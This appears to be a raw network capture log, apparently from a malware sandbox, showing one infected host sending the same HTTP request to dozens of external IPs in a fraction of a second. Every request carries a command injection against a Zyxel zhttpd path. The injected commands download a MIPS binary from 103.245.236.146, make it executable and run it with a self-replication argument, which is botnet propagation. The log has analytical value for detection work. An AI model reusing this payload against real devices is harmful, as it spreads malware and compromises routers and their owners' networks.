                                                        Jan 28, 2024 10:12:45.268748999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2634192.168.2.1458920163.204.250.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.268801928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2635192.168.2.1455526106.251.84.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.268838882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2636192.168.2.1439680108.231.84.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.268873930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2637192.168.2.1449666183.219.223.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.268929958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2638192.168.2.144880031.51.176.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.268958092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2639192.168.2.143601046.123.141.50443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.268987894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2640192.168.2.1441874103.193.101.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.269005060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2641192.168.2.144052449.170.29.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.269052029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2642192.168.2.1455984184.111.155.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.269114017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2643192.168.2.144915442.166.10.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.269140005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2644192.168.2.145888075.34.121.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.269188881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2645192.168.2.1434032134.99.215.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.269218922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2646192.168.2.143537861.215.234.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.269279003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2647192.168.2.144766292.125.71.53443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.269315004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2648192.168.2.1448092204.248.18.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.269345999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2649192.168.2.1457144167.183.233.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.269401073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2650192.168.2.143692212.239.164.31443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.269418001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2651192.168.2.1441296155.236.47.141443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.269475937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2652192.168.2.144340262.198.90.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.269511938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2653192.168.2.1443730160.7.124.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.269565105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2654192.168.2.1451914159.55.254.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.269579887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2655192.168.2.1439434136.167.81.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.269622087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2656192.168.2.1454202194.9.157.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.269676924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2657192.168.2.1448154162.135.137.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.269736052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2658192.168.2.1432958164.41.139.182443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.269752026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2659192.168.2.1442278216.163.4.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.269793987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2660192.168.2.144063817.105.113.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.269824028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2661192.168.2.1450994151.22.155.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.269865990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2662192.168.2.1432782183.159.178.95443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.269922018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2663192.168.2.1460210169.31.180.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.269939899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2664192.168.2.1439442134.78.120.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.269974947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2665192.168.2.1440236213.36.143.53443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.270005941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2666192.168.2.1437036129.159.177.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.270056009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2667192.168.2.144997095.208.211.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.270100117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2668192.168.2.1457660109.136.149.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.270119905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2669192.168.2.143967087.188.104.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.270169973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2670192.168.2.1434450115.83.86.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.270248890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2671192.168.2.144192665.197.108.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.270287991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2672192.168.2.1435360118.37.16.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.270340919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2673192.168.2.144133427.170.142.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.270360947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2674192.168.2.146023899.133.28.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.270379066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2675192.168.2.1441634213.241.240.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.270417929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2676192.168.2.143616242.250.81.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.270482063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2677192.168.2.1435636103.61.165.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.270488977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2678192.168.2.144393899.68.146.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.270539999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2679192.168.2.145967053.31.129.162443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.273535013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2680192.168.2.144491219.178.109.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.273555040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2681192.168.2.1433368223.175.237.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.273622036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2682192.168.2.1448598164.13.64.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.274398088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2683192.168.2.144525047.188.53.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.274422884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2684192.168.2.144808897.248.185.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.274446011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2685192.168.2.1435948150.80.242.65443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.274493933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2686192.168.2.1455414130.98.131.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.274533987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2687192.168.2.1433690140.105.76.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.274579048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2688192.168.2.1456732193.239.50.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.274636030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2689192.168.2.145628437.100.240.133443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.274652004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2690192.168.2.143352837.15.238.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.274694920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2691192.168.2.1438594108.141.33.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.274725914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2692192.168.2.1433372141.135.239.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.274765015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2693192.168.2.1437146212.168.52.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.274796009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2694192.168.2.144318614.166.72.189443
                                                        TimestampBytes transferredDirectionData
